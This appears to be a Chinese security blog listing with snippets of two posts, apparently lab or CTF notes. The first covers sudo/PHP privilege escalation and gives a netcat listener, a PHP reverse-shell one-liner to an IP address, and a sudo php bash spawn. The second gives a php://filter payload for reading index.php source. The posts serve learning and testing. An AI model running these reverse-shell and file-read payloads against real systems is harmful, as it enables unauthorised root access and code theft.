网络安全
「已注销」
我没登陆密码 因为同出口 抱歉了
展开
-
sudo -l 存在root /usr/bin/php 越权
root密码也可以是网站配置中数据库的密码nc -lvp 4444sudo /usr/bin/php -r '$sock=fsockopen("192.168.0.104",4444);exec("/bin/bash -i <&3 >&3 2>&3");'two越权sudo php -r 'system("/bin/bash");'...原创 2020-02-24 14:10:18 · 645 阅读 · 0 评论 -
php内置协议直接读取代码及preg_replace()任意php执行漏洞
尝试读取index.php的页面源码,通过php内置协议直接读取代码?page=php://filter/read=convert.base64-encode/resource=index.php原创 2020-02-17 16:05:08 · 476 阅读 · 0 评论